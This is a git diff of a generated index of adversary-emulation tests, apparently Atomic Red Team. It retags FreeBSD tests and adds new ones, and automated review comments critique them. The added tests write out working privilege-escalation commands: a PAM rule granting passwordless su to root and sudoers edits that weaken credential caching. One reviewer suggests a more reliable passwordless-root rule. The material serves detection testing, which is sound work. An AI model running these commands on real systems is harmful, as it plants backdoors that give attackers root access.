user. \n" supported_platforms: - - linux:freebsd + - linux dependencies: - description: 'chsh - change login shell, must be installed @@ -53389,7 +53352,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false @@ -53450,7 +53413,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux input_arguments: remote_url: description: url of remote payload @@ -54089,7 +54052,6 @@ execution: description: Download and execute shell script and write to file then execute locally using Python -c (command mode) supported_platforms: - - linux:freebsd - linux input_arguments: script_url: 
@@ -54131,7 +54093,6 @@ execution: description: Create Python file (.py) that downloads and executes shell script via executor arguments supported_platforms: - - linux:freebsd - linux input_arguments: python_script_name: @@ -54189,7 +54150,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux input_arguments: python_script_name: @@ -54254,7 +54214,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux dependencies: - description: 'Verify if python is in the environment variable path and attempt @@ -55573,7 +55532,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux input_arguments: time_spec: description: Time specification of when the command should run @@ -56632,7 +56591,7 @@ persistence: Upon successful execution, this test will insert a rule that allows every user to su to root without a password. supported_platforms: - - linux:freebsd + - linux input_arguments: path_to_pam_conf: description: PAM config file to modify. @@ -58667,9 +58626,8 @@ persistence: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -58727,7 +58685,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command: description: Command to execute @@ -60348,7 +60306,6 @@ persistence: description: Turn on Chrome/Chromium developer mode and Load Extension found in the src directory supported_platforms: - - linux:freebsd - linux - windows - macos @@ -60366,7 +60323,6 @@ persistence: auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f description: Install the "Minimum Viable Malicious Extension" Chrome extension supported_platforms: - - linux:freebsd - linux - windows - macos @@ -60383,7 +60339,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux - windows - macos 
@@ -62672,7 +62627,7 @@ persistence: Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if bash is installed. @@ -62715,7 +62670,7 @@ persistence: Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if bash is installed. @@ -63061,7 +63016,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: username: description: Username of the user to create @@ -63184,7 +63139,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: username: description: Username of the user to create @@ -64042,9 +63997,8 @@ persistence: persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n" supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: name: sh elevation_required: false @@ -70371,7 +70325,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command_to_add: description: Command to add to the .shrc file @@ -70392,7 +70346,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -70415,7 +70368,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -72694,7 +72646,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -73032,7 +72984,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: rc_service_path: description: Path to rc service file 
@@ -74533,7 +74485,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: time_spec: description: Time specification of when the command should run @@ -75168,7 +75120,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -75209,7 +75161,7 @@ persistence: the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n" supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -75251,7 +75203,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -75631,7 +75583,7 @@ command-and-control: ' supported_platforms: - - linux:freebsd + - linux input_arguments: destination_url: description: Destination URL to post encoded data. @@ -77896,7 +77848,7 @@ command-and-control: with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy service will be launched. \n" supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: "Tor must be installed on the machine \n" @@ -78050,7 +78002,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -78810,7 +78761,6 @@ command-and-control: This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -78899,7 +78849,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -78939,7 +78888,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: 
@@ -78978,7 +78926,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79009,7 +78956,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79040,7 +78986,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79071,7 +79016,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79280,7 +79224,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79937,9 +79880,8 @@ command-and-control: Note that this test may conflict with pre-existing system configuration. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: proxy_server: description: Proxy server URL (host:port) @@ -80502,7 +80444,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -80532,7 +80473,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -80569,9 +80509,8 @@ collection: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: test_folder: description: Path used to store files. @@ -80789,7 +80728,7 @@ collection: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Output file path @@ -80851,7 +80790,7 @@ collection: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Output file path @@ -81207,7 +81146,7 @@ collection: syslog.\n\nTo gain persistence the command could be added to the users .shrc or .profile \n" supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'This test requires to be run in a bash shell and that logger 
@@ -81241,7 +81180,6 @@ collection: persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: @@ -81828,7 +81766,7 @@ collection: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Location to save downloaded discovery.bat file @@ -82719,7 +82657,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -82756,7 +82693,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -82793,7 +82729,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -82830,7 +82765,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -87659,7 +87593,7 @@ credential-access: Upon successful execution, this test will insert a rule that allows every user to su to root without a password. supported_platforms: - - linux:freebsd + - linux input_arguments: path_to_pam_conf: description: PAM config file to modify. @@ -87935,7 +87869,7 @@ credential-access: syslog.\n\nTo gain persistence the command could be added to the users .shrc or .profile \n" supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'This test requires to be run in a bash shell and that logger @@ -87969,7 +87903,6 @@ credential-access: persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: 
@@ -88448,7 +88381,7 @@ credential-access: the sudo_bruteforce.sh which brute force guesses the password, then deletes the user\n" supported_platforms: - - linux:freebsd + - linux input_arguments: remote_url: description: url of remote payload @@ -90117,7 +90050,7 @@ credential-access: copy process memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed @@ -90162,7 +90095,6 @@ credential-access: copy a process's heap memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -90468,7 +90400,7 @@ credential-access: Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. supported_platforms: - - linux:freebsd + - linux input_arguments: interface: description: Specify interface to perform PCAP on. @@ -90706,7 +90638,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: ifname: description: Specify interface to perform PCAP on. @@ -90747,7 +90679,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: ifname: description: Specify interface to perform PCAP on. @@ -92871,9 +92803,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: search_path: description: Path where to start searching from. @@ -92924,7 +92855,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: search_path: description: Path where to start searching from. @@ -92986,7 +92917,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: search_path: description: Path where to start searching from. 
@@ -93048,7 +92979,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: search_path: description: Path where to start searching from @@ -95022,7 +94953,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed @@ -95128,7 +95059,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - macos - linux input_arguments: @@ -95158,9 +95088,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -95204,9 +95133,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -96457,7 +96385,7 @@ credential-access: ' supported_platforms: - - linux:freebsd + - linux input_arguments: target_host: description: IP Address / Hostname you want to target. @@ -97138,7 +97066,7 @@ credential-access: auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5 description: "/etc/master.passwd file is accessed in FreeBSD environments\n" supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed @@ -97157,7 +97085,6 @@ credential-access: auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n" supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -97179,7 +97106,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -97203,7 +97129,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -99059,7 +98984,6 @@ discovery: Upon successful execution, sh will stdout list of usernames. supported_platforms: - - linux:freebsd - linux - macos executor: 
@@ -100288,7 +100212,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -100307,7 +100230,6 @@ discovery: auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 description: "(requires root)\n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -100331,7 +100253,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -100354,7 +100275,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -100411,7 +100331,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed @@ -100431,7 +100351,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -100614,7 +100533,7 @@ discovery: Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -101153,7 +101072,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'service -e @@ -101283,7 +101202,7 @@ discovery: Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. supported_platforms: - - linux:freebsd + - linux input_arguments: interface: description: Specify interface to perform PCAP on. @@ -101521,7 +101440,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: ifname: description: Specify interface to perform PCAP on. @@ -101562,7 +101481,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: ifname: description: Specify interface to perform PCAP on. @@ -101861,7 +101780,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: package_checker: description: Package checking command. pkg info -x samba 
@@ -102197,7 +102116,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -102258,7 +102176,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: | kldstat | grep -i "vmm" @@ -102283,7 +102201,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -102357,9 +102274,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'env @@ -102588,7 +102504,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: | kldstat @@ -103128,7 +103044,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -103193,7 +103108,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Path where captured results will be placed. @@ -103405,7 +103320,7 @@ discovery: Upon successful execution, sh will spawn multiple commands and output will be via stdout. supported_platforms: - - linux:freebsd + - linux executor: command: | if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi; @@ -104003,9 +103918,8 @@ discovery: https://perishablepress.com/list-files-folders-recursively-terminal/ supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -104031,9 +103945,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -104225,7 +104138,6 @@ discovery: Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh 
@@ -104575,7 +104487,6 @@ discovery: Upon successful execution, sh will execute ps and output to /tmp/loot.txt. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -104793,9 +104704,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: | if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; @@ -105024,7 +104934,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'cat /etc/pam.d/passwd @@ -105305,7 +105215,6 @@ discovery: Upon successful execution, the output will contain the environment variables that indicate the 5 character locale that can be looked up to correlate the language and territory. supported_platforms: - - linux:freebsd - linux executor: command: 'locale @@ -105363,7 +105272,6 @@ discovery: also used as a builtin command that does not generate syscall telemetry but does provide a list of the environment variables. supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: @@ -105739,7 +105647,7 @@ discovery: Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. supported_platforms: - - linux:freebsd + - linux executor: command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd'' @@ -106104,7 +106012,6 @@ discovery: Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh @@ -106130,7 +106037,6 @@ discovery: Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. supported_platforms: - - linux:freebsd - linux - macos input_arguments: 
@@ -106324,7 +106230,7 @@ discovery: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'netstat -r | grep default @@ -106603,7 +106509,7 @@ discovery: Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout. supported_platforms: - - linux:freebsd + - linux input_arguments: host: description: Host to scan. @@ -107186,7 +107092,7 @@ discovery: description: "Identify system time. Upon execution, the local computer system time and timezone will be displayed. \n" supported_platforms: - - linux:freebsd + - linux - macos executor: command: 'date @@ -113671,7 +113577,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: pwd_for_encrypted_file: @@ -113717,7 +113622,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: pwd_for_encrypted_file: @@ -113756,7 +113660,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: cped_file_path: @@ -113807,7 +113710,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: private_key_path: @@ -114349,9 +114251,8 @@ impact: This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'yes > /dev/null @@ -114549,7 +114450,6 @@ impact: Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -115231,9 +115131,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to restart (can be minutes or specific time) 
@@ -115251,9 +115150,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to shutdown (can be minutes or specific time) @@ -115271,9 +115169,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'reboot @@ -115286,7 +115183,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux executor: command: 'halt -p @@ -115300,7 +115196,7 @@ impact: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'halt -r @@ -115326,7 +115222,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux executor: command: 'poweroff @@ -115340,7 +115235,7 @@ impact: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'poweroff -r 3 @@ -117508,7 +117403,7 @@ initial-access: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -117549,7 +117444,7 @@ initial-access: the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n" supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -117591,7 +117486,7 @@ initial-access: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -118137,7 +118032,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: input_file: description: Test file to upload @@ -118316,7 +118210,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: domain: description: target SSH domain @@ -118338,7 +118231,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: user_name: description: username for domain @@ -118738,7 +118630,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: file_name: description: File name 
@@ -119022,7 +118913,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd executor: steps: | 1. Victim System Configuration: @@ -119069,7 +118959,6 @@ exfiltration: ' supported_platforms: - - linux:freebsd - linux executor: steps: "1. On the adversary machine run the below command.\n\n tshark -f @@ -119253,7 +119142,7 @@ exfiltration: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index a4d91cbd89..5b2a9c0bdd 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -669,6 +669,36 @@ defense-evasion: ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} + ' + - name: Malicious PAM rule (freebsd) + auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3 + description: | + Inserts a rule into a PAM config and then tests it. + + Upon successful execution, this test will insert a rule that allows every user to su to root without a password. + supported_platforms: + - linux + input_arguments: + path_to_pam_conf: + description: PAM config file to modify. + type: string + default: "/etc/pam.d/su" + pam_rule: + description: Rule to add to the PAM config. + type: string + default: auth sufficient pam_succeed_if.so uid >= 0 + index: + description: Index where the rule is inserted. + type: integer + default: 8 + executor: + name: sh + elevation_required: true + command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} + + ' + cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf} + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 @@ -921,9 +951,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value 
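Review bot: In the "Malicious PAM rule (freebsd)" test the default `pam_rule` names `pam_succeed_if.so`, a Linux-PAM module; FreeBSD's base PAM stack is OpenPAM, which as far as I know does not ship that module, so on a stock system the inserted line is more likely to break the `su` auth chain than to grant passwordless root. A module the base system does provide, `auth sufficient pam_permit.so`, would exercise the same weakness (every user may `su` without a password) and would be a safer default for this test. The description also says the rule is inserted "and then tests it", but the executor only runs the `sed` insert; either drop the claim or add a step such as `su -m nobody -c "su root -c id"` so a failed insert is visible. Because this index is generated, the fix belongs in the T1556.003 atomic YAML rather than here.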
@@ -945,9 +974,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -969,9 +997,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -993,9 +1020,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -1070,9 +1096,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: owner: description: Username of desired owner @@ -1127,6 +1152,24 @@ defense-evasion: ' name: sh + - name: chflags - Remove immutable file attribute + auto_generated_guid: 60eee3ea-2ebd-453b-a666-c52ce08d2709 + description: | + Remove's a file's `immutable` attribute using `chflags`. + This technique was used by the threat actor Rocke during the compromise of Linux web servers. + supported_platforms: + - linux + input_arguments: + file_to_modify: + description: Path of the file + type: path + default: "/tmp/T1222.002.txt" + executor: + command: | + touch #{file_to_modify} + chflags simmutable #{file_to_modify} + chflags nosimmutable #{file_to_modify} + name: sh - name: Chmod through c script auto_generated_guid: 973631cf-6680-4ffa-a053-045e1b6b67ab description: 'chmods a file using a c script 
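Review bot: The new "chflags - Remove immutable file attribute" test sets and clears `simmutable` (the system immutable flag, `schg`) but declares no `elevation_required`, so run as a normal user both `chflags` calls fail with EPERM and the test silently does nothing. Either add `elevation_required: true` to the executor (and note that clearing `schg` also needs `kern.securelevel` at 0 or below, as far as I know), or switch to the user-settable flag pair `chflags uchg #{file_to_modify}` / `chflags nouchg #{file_to_modify}`, which any owner can toggle and still models the Rocke behaviour described. A `cleanup_command: rm #{file_to_modify}` would also keep `/tmp/T1222.002.txt` from accumulating between runs.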
@@ -1158,6 +1201,36 @@ defense-evasion: executor: command: "#{compiled_file} /tmp/ T1222002\n" name: sh + - name: Chmod through c script (freebsd) + auto_generated_guid: da40b5fe-3098-4b3b-a410-ff177e49ee2e + description: 'chmods a file using a c script + + ' + supported_platforms: + - linux + input_arguments: + source_file: + description: Path of c source file + type: path + default: PathToAtomicsFolder/T1222.002/src/T1222.002.c + compiled_file: + description: Path of compiled file + type: path + default: "/tmp/T1222002" + dependency_executor_name: sh + dependencies: + - description: 'Compile the script from (#{source_file}). Destination is #{compiled_file} + + ' + prereq_command: 'cc #{source_file} -o #{compiled_file} + + ' + get_prereq_command: 'cc #{source_file} -o #{compiled_file} + + ' + executor: + command: "#{compiled_file} /tmp/ T1222002\n" + name: sh - name: Chown through c script auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389 description: 'chowns a file to root using a c script @@ -1192,6 +1265,37 @@ defense-evasion: ' name: sh elevation_required: true + - name: Chown through c script (freebsd) + auto_generated_guid: eb577a19-b730-4918-9b03-c5edcf51dc4e + description: 'chowns a file to root using a c script + + ' + supported_platforms: + - linux + input_arguments: + source_file: + description: Path of c source file + type: path + default: PathToAtomicsFolder/T1222.002/src/chown.c + compiled_file: + description: Path of compiled file + type: path + default: "/tmp/T1222002own" + dependency_executor_name: sh + dependencies: + - description: 'Compile the script from (#{source_file}). Destination is #{compiled_file} + + ' + prereq_command: 'cc #{source_file} -o #{compiled_file} + + ' + get_prereq_command: 'cc #{source_file} -o #{compiled_file} + + ' + executor: + command: "#{compiled_file} #{source_file}\n" + name: sh + elevation_required: true T1216.001: technique: x_mitre_platforms: 
@@ -2037,6 +2141,27 @@ defense-evasion: name: sh elevation_required: true command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" + - name: Sudo usage (freebsd) + auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1 + description: 'Common Sudo enumeration methods. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n" - name: Unlimited sudo cache timeout auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc description: 'Sets sudo caching timestamp_timeout to a value for unlimited. @@ -2053,6 +2178,31 @@ defense-evasion: command: | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers + - name: Unlimited sudo cache timeout (freebsd) + auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991 + description: 'Sets sudo caching timestamp_timeout to a value for unlimited. + This is dangerous to modify without using ''visudo'', do not do this on a + production system. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: | + sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers + sudo visudo -c -f /usr/local/etc/sudoers - name: Disable tty_tickets for sudo caching auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous 
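Review bot: In "Unlimited sudo cache timeout (freebsd)" the edit `sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers` will not work on FreeBSD, because BSD `sed -i` takes a mandatory backup-suffix argument: the substitution expression is consumed as the suffix and `/usr/local/etc/sudoers` is then parsed as the script, so nothing is modified. The other FreeBSD tests in this same diff already use the portable form; this one should read `sudo sed -i "" 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers`. Since the test deliberately bypasses `visudo` on a live sudoers file, a `cleanup_command` that reverts the change (`sudo sed -i "" 's/,timestamp_timeout=-1//' /usr/local/etc/sudoers` followed by `sudo visudo -c`) would also be worth adding.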
@@ -2068,6 +2218,30 @@ defense-evasion: command: | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" sudo visudo -c -f /etc/sudoers + - name: Disable tty_tickets for sudo caching (freebsd) + auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a + description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous + to modify without using ''visudo'', do not do this on a production system. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: | + sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers" + sudo visudo -c -f /usr/local/etc/sudoers T1578: technique: x_mitre_platforms: @@ -2602,7 +2776,6 @@ defense-evasion: supported_platforms: - macos - linux - - linux:freebsd input_arguments: test_message: description: Test message to echo out to the screen @@ -3262,6 +3435,20 @@ defense-evasion: command: | if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi; if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi; + - name: Detect Virtualization Environment (FreeBSD) + auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd + description: | + Detects execution in a virtualized environment. + At boot, dmesg stores a log if a hypervisor is detected. + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization + Environment detected"; fi + + ' T1070.002: technique: x_mitre_platforms: 
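Review bot: The description of "Detect Virtualization Environment (FreeBSD)" says the detection comes from `dmesg`, but the command actually reads `sysctl -n hw.hv_vendor`; the text should match, e.g. "The kernel exposes the detected hypervisor vendor via the hw.hv_vendor sysctl; an empty value means no hypervisor was identified." Reading a sysctl needs no privilege, so `elevation_required: true` appears unnecessary here and makes the test harder to run from an unprivileged foothold. Note that `hw.hv_vendor` only reflects hypervisors the kernel recognises, so a negative result is not proof of bare metal; the description could say so.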
